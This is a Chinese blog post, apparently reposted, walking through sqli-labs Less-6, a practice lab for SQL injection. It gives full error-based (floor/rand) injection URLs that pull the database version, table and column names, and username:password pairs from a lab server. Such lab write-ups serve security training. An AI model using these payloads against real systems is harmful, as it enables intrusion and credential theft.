Less-6
发布日期:2022-09-10 02:50:03
浏览次数:3
分类:博客文章
本文共 1028 字,大约阅读时间需要 3 分钟。
Less-6
(1)判断注入点的闭合方式
通过添加不同的特殊符号,发现双引号出现报错提示,因此闭合方式为双引号
(2)报错注入
由于页面没有回显,所以采用报错注入更加方便
尝试了上一关结束的几种报错方法,发现只有floor的报错有回显,所以使用该方式注入:
#查询数据库信息 http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat(database(),0x7e,version(),floor(rand(0)*2)) x from information_schema.tables group by x --+ #查询表名
http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x --
#查询列名
http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x --+
#查询内容
http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat((select concat(username,0x3a,password ) from users limit 1,1),floor(rand(0)*2)) x from information_schema.tables group by x --+
注:更多方法可以自己尝试下!,欢迎指正和交流~~
转载地址:https://www.cnblogs.com/stickonit/p/16051602.html 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!
发表评论
最新留言
网站不错 人气很旺了 加油
[***.192.178.218]2024年03月21日 21时30分33秒
关于作者
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
java notify怎么用_java 如何使用notify()
2019-04-21
java metrics 怎么样,Java metrics
2019-04-21
普朗克公式matlab,用MATLAB实现普朗克函数积分的快捷计算.pdf
2019-04-21
swoolec+%3c?php,PHP+Swoole并发编程的魅力
2019-04-21
php 404配置,phpcms如何配置404
2019-04-21
matlab wash矩阵产生,洗衣机净衣效能与衣损程度的关系分析
2019-04-21
python多线程实现kmeans,3种方式实现python多线程并发处理
2019-04-21
matlab 变量不存在,matlab程序运行时提示变量未定义
2019-04-21
php编码函数 base58,1. Base58可逆加密
2019-04-21
oracle10g dblink优化,Oracle10g通过dblink访问数据异常
2019-04-21
linux安装时的iso文件,直接用ISO文件在linux上安装新系统
2019-04-21
linux修改文件权限为所有人都可以访问,Linux 笔记分享八:文件权限的设定
2019-04-21
linux中卸载ambri-servle,Kerberos 命令使用
2019-04-21
linux两台主机添加信任,Linux两台机器间添加信任,实现不用密码问,互传文件...
2019-04-21